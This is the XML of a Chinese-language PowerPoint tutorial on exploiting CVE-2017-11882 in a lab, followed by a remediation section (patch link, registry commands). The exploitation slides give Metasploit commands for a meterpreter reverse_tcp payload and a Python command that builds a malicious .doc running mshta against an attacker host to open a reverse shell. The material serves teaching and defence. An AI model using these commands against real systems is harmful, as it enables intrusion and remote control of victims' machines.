            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）	通过命令行查看</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>tasklist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> /svc | find “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务名”：获取对应服务的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>PID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>号</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6008EE17-32E4-4FC4-B766-C5B73673E603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678159" y="5187271"/>
            <a:ext cx="3632584" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> | find “PID” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>PID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>号查找端口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16C38FA9-8E6A-4ABB-85B9-E1A55A229688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="1812369"/>
            <a:ext cx="9619701" cy="2638298"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{559112DE-6ED1-4539-AA8D-2274F769CC74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4690602" y="3516543"/>
            <a:ext cx="7501398" cy="3341457"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2063267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1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）	使用该模块</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>use exploit/windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/cve_2017_11882</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C15580CC-E462-4FC8-90F2-E883A8897621}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4441371" y="902725"/>
            <a:ext cx="7750629" cy="5955275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3746572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1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）	设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>为反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>set payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D4D319D-AEAB-4FBB-A5BA-160D4967C0D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4328809" y="869251"/>
            <a:ext cx="7863191" cy="5988749"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3058105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1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）	设置本机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件路径</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 192.168.135.128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>set URIPATH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>abc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24F2C6AE-5BB3-4B04-B55F-B668B763C9D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4058816" y="688101"/>
            <a:ext cx="8133184" cy="6169900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1191366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2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）	生成反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>doc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>漏洞文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>python Command109b_CVE-2017-11882.py -c "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>mshta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> http://192.168.135.128:8080/abc" -o test2.doc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>并打开文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A5A8C2B-9049-4B0D-9050-64218EF64AC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4226767" y="892479"/>
            <a:ext cx="7965233" cy="6009886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3286061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830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）	开始监听</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2B8E7F8-02D7-4A50-A48A-B27088751F73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4328809" y="738608"/>
            <a:ext cx="7863191" cy="6119392"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA848567-E3C7-4C22-8B2A-FDA92CB7D2F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4320106" y="1073020"/>
            <a:ext cx="7871894" cy="5784980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5673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三、漏洞利用</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143339" y="2234936"/>
            <a:ext cx="4185470" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）	验证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>sessions –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{327DB643-E676-4A7C-808D-CDA8628287D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3881535" y="567621"/>
            <a:ext cx="8310465" cy="6290380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{109866B2-103B-4C8C-A6FA-BE7DC01E7BF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3881535" y="449557"/>
            <a:ext cx="8310465" cy="6408443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309052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258783"/>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四、解决方案</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7ED27E5A-DFE9-471F-AE1C-E48F0B6236D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="843558"/>
            <a:ext cx="12126416" cy="6001643"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、微软已经对此漏洞做出了修复。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	(1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>下载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>更新补丁进行修补</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>功能，定期对系统进行自动更新</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、由于该公式编辑器已经</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>17</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>年未做更新，可能存在大量安全漏洞，建议在注册表中取消该模块的注册。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	(1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>按下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Win+R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>组合键，打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>cmd.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>输入以下两条命令：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>reg add  “HKLM\SOFTWARE\Microsoft\Office\Common\COM     Compatibility\{0002CE02-0000-0000-C000-000000000046} ” /v         “Compatibility  Flags”             /t  REG_DWORD /d                 0x400                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>reg add  “HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM     Compatibility\{0002CE02-0000-0000-C000-000000000046} ” /v         “Compatibility  Flags”             /t  REG_DWORD /d                 0x400 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="705829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38529" y="2852937"/>
            <a:ext cx="6372257" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>谢谢，敬请批评指正！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678159" y="986300"/>
            <a:ext cx="9688029" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>5.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查看网络情况</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	ipconfig/all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：网络配置情况</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	route print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：路由器信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> – a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：查看</a:t>
            </a:r>
            <a:r>
